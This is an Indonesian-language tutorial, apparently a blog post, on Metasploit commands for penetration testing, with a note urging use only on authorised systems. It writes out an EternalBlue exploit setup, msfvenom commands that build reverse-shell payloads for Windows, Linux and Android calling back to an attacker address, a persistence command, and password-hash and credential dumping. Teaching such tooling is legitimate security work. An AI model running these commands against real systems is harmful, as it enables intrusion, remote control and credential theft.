Panduan Lengkap Metasploit: Basic hingga Intermediate Command untuk Penetration Testing
Metasploit Framework merupakan salah satu tools penetration testing paling populer di dunia keamanan siber. Framework ini digunakan oleh penetration tester, red team, dan peneliti keamanan untuk melakukan eksploitasi, validasi kerentanan, hingga simulasi serangan terhadap sistem target.
Artikel ini membahas command dasar hingga intermediate yang umum digunakan dalam workflow penetration testing menggunakan Metasploit Framework.
Gunakan hanya pada sistem yang memiliki izin resmi untuk diuji.
Menjalankan Metasploit Framework
Buka terminal:
msfconsole
Tunggu hingga Metasploit selesai melakukan proses loading module.
Basic Command Metasploit
Melihat Bantuan
help
atau:
?
Menampilkan Informasi Workspace
workspace
Membuat workspace baru:
workspace -a pentestlab
Berpindah workspace:
workspace pentestlab
Melihat Module
show exploits
show payloads
show auxiliary
show post
show encoders
Mencari Exploit
search smb
Contoh:
search eternalblue
Menggunakan Module
use exploit/windows/smb/ms17_010_eternalblue
Melihat Opsi Module
show options
Mengatur Parameter
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Menjalankan Exploit
run
atau:
exploit
Auxiliary Scanner
Scan Port
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run
SMB Version Scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.10
run
FTP Anonymous Login Check
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.1.20
run
Payload dan Meterpreter
Melihat Session Aktif
sessions
Interact ke Session
sessions -i 1
Command Meterpreter Dasar
Melihat informasi sistem:
sysinfo
Melihat user:
getuid
Membuka shell:
shell
Melihat proses:
ps
Migrasi proses:
migrate PID
Dump hash password:
hashdump
Screenshot desktop:
screenshot
Upload file:
upload file.txt
Download file:
download secret.txt
Background session:
background
Intermediate Command
Database Command
Inisialisasi database:
db_status
Import hasil Nmap:
db_import scan.xml
Melihat host tersimpan:
hosts
Melihat service:
services
Integrasi dengan Nmap
Menjalankan Nmap dari Metasploit:
db_nmap -sV 192.168.1.10
Exploit Multi Handler
Digunakan untuk menerima reverse shell.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run
Membuat Payload dengan msfvenom
Payload Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exe
Payload Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf
Payload Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > payload.apk
Post Exploitation
Enumerasi Network
ipconfig
route
Persistence
run persistence -U -i 5 -p 4444 -r 192.168.1.5
Credential Gathering
load kiwi
creds_all
Tips Penggunaan Aman
- Gunakan hanya pada environment legal
- Jangan menjalankan exploit sembarangan ke internet publik
- Gunakan lab virtual untuk belajar
- Selalu dokumentasikan aktivitas penetration testing
- Perbarui Metasploit secara rutin
Kesimpulan
Metasploit Framework tetap menjadi salah satu tools paling powerful dalam dunia penetration testing modern. Memahami command dasar hingga intermediate akan membantu penetration tester melakukan asesmen keamanan secara lebih efektif dan terstruktur.
Dengan kombinasi scanning, exploitation, payload management, dan post-exploitation, Metasploit menjadi platform penting dalam workflow offensive security dan red teaming modern.